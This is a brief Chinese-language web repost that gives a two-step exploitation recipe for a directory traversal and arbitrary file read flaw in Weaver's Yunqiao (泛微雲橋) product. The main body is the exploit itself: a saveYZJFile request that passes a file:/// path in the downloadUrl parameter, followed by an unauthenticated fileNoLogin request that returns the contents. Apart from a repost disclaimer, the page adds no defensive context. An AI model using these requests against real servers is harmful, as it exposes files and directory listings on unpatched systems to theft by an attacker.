泛微雲橋目錄遍歷+任意文件讀取 最新


上一篇文章:泛微雲橋任意文件讀取漏洞

利用方式:

第一步:

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt  

第二步:

/file/fileNoLogin/id

注:

downloadUrl參數填寫文件的絕對路徑時,可以造成任意文件讀取;

downloadUrl參數填寫目錄的絕對路徑時,可以造成目錄遍歷。

 

 

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM